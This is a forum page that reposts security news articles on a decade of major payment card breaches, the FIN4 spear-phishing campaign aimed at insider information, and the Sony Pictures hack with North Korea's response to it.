Luckily, very little fraudulent activity occurred on the stolen card numbers, primarily because the breaches were caught fairly soon, making them relatively minor incidents in the scheme of things, compared with other breaches that have occurred over the years that resulted in losses of millions of dollars.

The Target breach was notable for one other reason, however: when it came to security, the company did many things right, such as encrypting its card data and installing a multi-million-dollar state-of-the-art monitoring system not long before the breach occurred. But although the system worked exactly as designed, detecting and alerting workers when it appeared that sensitive data was being exfiltrated from its network, workers failed to act on these alerts to prevent data from being stolen.

Below, we look back on a decade of notable breaches, many of which happened despite the establishment of Payment Card Industry security standards that are supposed to protect cardholder data and lessen the chance that it will be stolen or be useful to criminals even when it’s nabbed. The PCI security standard, which went into effect in 2005, is a list of requirements — such as installing a firewall and anti-virus software, changing vendor default passwords, encrypting data in transit (but only if it crosses a public network) — that companies processing credit or debit card payments are required by card companies to have in place. Companies are required to obtain regular third-party security audits from an approved assessor to certify ongoing compliance. But nearly every company that was victim to a card breach was certified as compliant to the PCI security standard at the time of the breach, only to be found noncompliant in a post-breach assessment.

10. CardSystems Solutions – 40 million cards

CardSystems Solutions, a now-defunct card processing company in Arizona, holds the distinction of being the first major business to be breached following the passage of California’s breach notification law in 2002 — the first law in the nation requiring businesses to tell customers when their sensitive data has been stolen. The intruders placed a malicious script on the company’s network that was designed to sniff for card transaction data, resulting in the names, card numbers and security codes of some 40 million debit and credit cards being exposed to the hackers. CardSystems was storing unencrypted transaction data, after transactions were completed, in violation of the PCI security standard. The company was certified PCI compliant in June 2004 and discovered it had been breached in May 2005.

9. TJX – 94 million cards

TJX was just one of more than a dozen retailers hacked by Albert Gonzalez and a team of cohorts, including two Russian hackers. They breached the TJX network in 2007 through war-dialing — a practice that involves driving by businesses and offices with an antenna hooked to a laptop with special software to suss out wireless networks. From TJX’s wireless network, they burrowed their way into the company’s card processing network, which was transmitting card data unencrypted. The initial breach occurred in July 2005 but wasn’t discovered until December 2006. Additional breaches occurred later in 2005, 2006 and even in mid-January 2007, after the initial breach had been discovered. The breach cost the company about $256 million.

8. Heartland Payment Systems – 130 million cards

Albert Gonzalez earned his moniker as the TJX hacker, but the penultimate breach attributed to him and his Russian hacker gang was Heartland Payment Systems — a card processing company in New Jersey. The hack operation began small — focusing on TJX and other end retailers where customer card data was first collected. But they quickly realized the real gold was held by the card processors that aggregated millions of cards from multiple businesses before routing the card data to banks to be verified. Heartland was the Fort Knox of processors with 250,000 businesses processing about 100 million card transactions through them each month. The company learned in October 2008 that it might have been hacked, but it took nearly three months to confirm the breach. The attackers had installed a sniffer in an unallocated portion of a Heartland server and eluded forensic investigators for months. Heartland had been certified compliant six times before the breach, including in April 2008. The breach began the next month, but wasn’t discovered until January 2009. It cost the company more than $130 million in fines, legal expenses and other costs, though the company recovered some of this through insurance.

7. RBS WorldPay – 1.5 million cards

The RBS hack isn’t significant for the number of cards affected — the hackers used only a small number of cards at their disposal for their heist — but for the amount of money they stole using the cards. This wasn’t a traditional retailer or card processing hack. RBS WorldPay is the payment-processing arm of the Royal Bank of Scotland and provides a number of electronic payment processing services, including electronic benefits transfer payments and prepaid cards, such as payroll cards — offered by some employers as a paperless alternative to paychecks. It discovered in November 2008 that intruders had accessed account details for 100 payroll cards and raised the balance on the compromised cards as well as their daily withdrawal limits. In some cases, they raised the withdrawal limit to $500,000. They distributed the card details to an army of cashers who embedded the data onto blank cards. In a global coordinated heist, the cashers then hit more than 2,000 ATMs with the fraudulent cards, netting about $9.5 million in less than 12 hours.

6. Barnes and Noble – unknown

This breach made the list for the first major operation involving point-of-sale terminals, though more than a year after the hack, Barnes and Noble has still provided no details about the breach or the number of cards affected. All that’s known is that the FBI began investigating the incident in September 2012. The skimming software was discovered on point-of-sale devices in 63 Barnes and Noble stores in nine states, though only one POS device in each store was affected. It’s not known how the skimmer was placed on the devices.

5. Canadian Carding Ring

The Barnes and Noble heist was reminiscent of a Canadian operation that occurred months earlier and involved tampering with POS terminals in order to steal more than $7 million. Police said the group, based out of Montreal, operated in a coordinated fashion with military precision, doling out cloned cards to runners in lock boxes. One part of the gang was responsible for installing skimming devices on ATMs and for seizing point-of-sale machines (POS) from restaurants and retailers in order to install sniffers on them before returning them to the businesses. Police said the thieves took the POS machines to cars, vans and hotel rooms, where technicians hacked into the processors and rigged them so that card data could be siphoned from them remotely using Bluetooth. The modifications took only about an hour to accomplish, after which the devices were returned to the businesses before they re-opened the next day. The ring is believed to have had inside help from employees who took bribes to look the other way.

4. Unknown Card Processor in India and U.S. – unknown

In a heist that was similar to the RBS WorldPay breach, hackers broke into unnamed card processing companies in India and the U.S. that handled pre-paid card accounts. They increased the limits on the accounts and handed off the details to cashers who drained more than $45 million from ATMs around the world.

3. Cisero’s Ristorante and Nightclub – Unknown

It’s unknown whether Cisero’s was actually ever breached or, if it was, how many cards were stolen. But those aren’t why Cisero’s made our list. The small, family-run restaurant in Park City, Utah made the list because it took on a David and Goliath battle against the card payment industry for unfair fines for a breach that has never been proven to have occurred. In March 2008, Visa notified U.S. Bank that Cisero’s network might have been compromised after cards used at the restaurant were used for fraudulent transactions elsewhere. U.S. Bank, and its affiliate Elavon, processed bank card transactions for Cisero’s. The restaurant hired two firms to conduct a forensic investigation, but neither found any evidence that a breach occurred or that payment card data of any kind was stolen. The audits, however, did find that the point-of-sale system the restaurant used stored unencrypted customer account numbers, in violation of the PCI standard. Visa and MasterCard imposed fines of about $99,000 on U.S. Bank and Elavon since, under the PCI system, the banks and card processors that process transactions for merchants are fined, not the merchants and retailers themselves. U.S. Bank and Elavon then seized about $10,000 from the restaurant’s U.S. Bank account before the restaurant owners closed the account and sued.

2. Global Payments Inc – 1.5 million

This Atlanta-based payments processor claimed it was breached sometime in January or February 2012. But in April 2012, Visa warned issuers that the breach likely dated back to 2011 and might have affected transactions going back to June 7, 2011. Little is known about the breach. In an April 2012 conference call with investors, CEO Paul R. Garcia told listeners that the breach had been limited to a “handful of servers” in its North American processing system and that no fraudulent activity had been seen on any of the cards. Unlike most breaches that are only discovered months after the intrusion and generally only after Visa, MasterCard and other members of the card industry notice a pattern of fraudulent activity on accounts, Garcia claimed his company discovered the breach on its own. “We had security measures in place that caught it,” he said. He acknowledged, however, that while the company’s loss-prevention software spotted data being exfiltrated from the company’s servers, it hadn’t prevented the data from going out in the first place. “So partly it worked and partly it didn’t,” he told investors. He said the company would be investing in additional security. The breach cost the company an estimated $94 million; $36 million of this was for fines and fraud losses and about $60 million was for investigation and remediation.

1. The Next Big Breach

Like death and taxes, the next big card breach is an assured thing.

Source
-
North Korea refuses to deny Sony Pictures cyber-attack
Aerosol replied to Aerosol's topic in Stiri securitate
@behave well, Christmas is coming; anyway, in my opinion Korea is making a big mistake. -
Hackers are hitting companies with targeted attacks designed to steal insider information that could be used to manipulate stock trading, according to researchers at FireEye.

FireEye reported uncovering the campaign in its "Hacking the street? FIN4 likely playing the market" threat report, confirming that the hackers have already targeted at least 100 companies.

"FireEye is currently tracking a group that targets the email accounts of individuals privy to the most confidential information of more than 100 companies," read the report. "The FIN4 [hacking group] distinctly focuses on compromising the accounts of individuals who possess non-public information about merger and acquisition deals and major market-moving announcements."

FireEye said that the campaign has been active since at least the middle of 2013, and primarily targets C-level executives, legal counsel, regulatory bodies, risk and compliance personnel, researchers, scientists and "people in other advisory roles".

"FIN4 sends spear phishing emails to selected targets with weaponised documents," FireEye threat intelligence manager Jen Weedon told V3. "Based on what we've observed of FIN4's activity, the group selects its targets based on their roles and probable access to sensitive, material, non-public information. The document, when opened, will result in a prompt for the target's username and password, which are then transmitted to servers controlled by FIN4."

Weedon explained that the campaign is mainly US focused and targets specific industries. "We have observed some international organisations being targeted. However, the overwhelming majority of targets have been in the US," Weedon said. "The primary industry hit has been healthcare and pharmaceuticals, and 68 percent of the 100-plus companies targeted are in that industry. Twenty percent are firms that advise public companies on securities, legal and M&A matters, and 12 percent are other publicly traded companies in various industries."

Weedon added that FIN4 uses a basic infection method, but that it is hard to detect and firms should employ a variety of protective measures. "The relative simplicity of FIN4's tactics (spear phishing, theft of valid credentials, lack of any malware installed on victim machines) makes their intrusion activity difficult to detect. However a few basic security measures can help thwart the group's efforts," Weedon said. "Disabling Visual Basic for Applications macros in Microsoft Office by default, as well as blocking the domains listed in our report, will help protect against FIN4's current activities. Additionally, enabling two-factor authentication for Outlook Web Access and any other remote access mechanisms can help prevent credentials stolen in this manner from being leveraged successfully."

Data theft is an ongoing problem facing businesses of all sizes. Hackers operating under the #GOP moniker reportedly stole intellectual property from Sony in November. The FBI reported on 1 December that it had found evidence that the #GOP hackers may be North Korean.

Source
-
North Korea has refused to deny involvement in a cyber-attack on Sony Pictures that came ahead of the release of a film about leader Kim Jong-un.

Sony is investigating after its computers were attacked and unreleased films made available on the internet.

When asked if it was involved in the attack, a spokesman for the North Korean government replied: "Wait and see."

In June, North Korea complained to the United Nations and the US over the comedy film The Interview. In the movie, Seth Rogen and James Franco play two reporters who are granted an audience with Kim Jong-un. The CIA then enlists the pair to assassinate him.

North Korea described the film as an act of war and an "undisguised sponsoring of terrorism", and called on the US and the UN to block it.

California-based Sony Pictures' computer system went down last week and hackers then published a number of as-yet unreleased films on online download sites. Among the titles is a remake of the classic film Annie, which is not due for release until 19 December. The film about North Korea does not appear to have been leaked.

When asked about the cyber-attack, a spokesman for North Korea's UN mission said: "The hostile forces are relating everything to the DPRK (North Korea). I kindly advise you to just wait and see."

On Monday, Sony Pictures said it had restored a number of important services that had to be shut down after the attack. It said it was working closely with law enforcement officials to investigate the matter but made no mention of North Korea.

The FBI has confirmed that it is investigating. It has also warned other US businesses that unknown hackers have launched a cyber-attack with destructive malware.

Analysis: Leo Kelion, technology desk editor

Suggestions that North Korea could be behind the Sony Pictures hack have drawn incredulity from some, surprised that the "Hermit Kingdom" might be able to pull off such a stunt. In fact, experts say Pyongyang's cyber-skills should not be underestimated.

One US government adviser warned last year that North Korean hackers posed "an important 'wild card' threat" to US and international security.

Being sure about how far its cyber-capabilities extend isn't easy. A report by Hewlett Packard's security division noted that most North Koreans were restricted to an intranet system, separate from the wider internet, which limits their links to the outside world. But the report noted that the state's education system places special emphasis on mathematics, which has helped it develop skilled programmers, cryptographers and security researchers.

According to a report by Al-Jazeera, North Korean defectors have spoken of promising students going on a two-year accelerated university course before heading to China and Russia for a year to hone their hacking skills.

A US analyst quoted a defector who claimed to be part of North Korea's Unit 121 hacking squad until he escaped in 2004. He said some operations had been carried out from a Pyongyang-owned hotel in Shenyang, China.

According to HP, North Korea's "cyber-warriors" are thought to have carried out a wide variety of attacks, including:

Spreading malware via video games
Stealing details of foreign technologies stored on computers
Carrying out distributed denial of service attacks (DDoS), which knock services offline by flooding them with traffic sent from hijacked foreign computers
Cyber-psychological operations - posting propaganda to social networks and "trolling" message boards

However, hacking a major corporation to make threatening demands is not a behaviour that has been linked to North Korea in the past, and the hashtag #GOP (Guardians of Peace) - used in the Sony attack - is not known to have been used by Pyongyang.

Source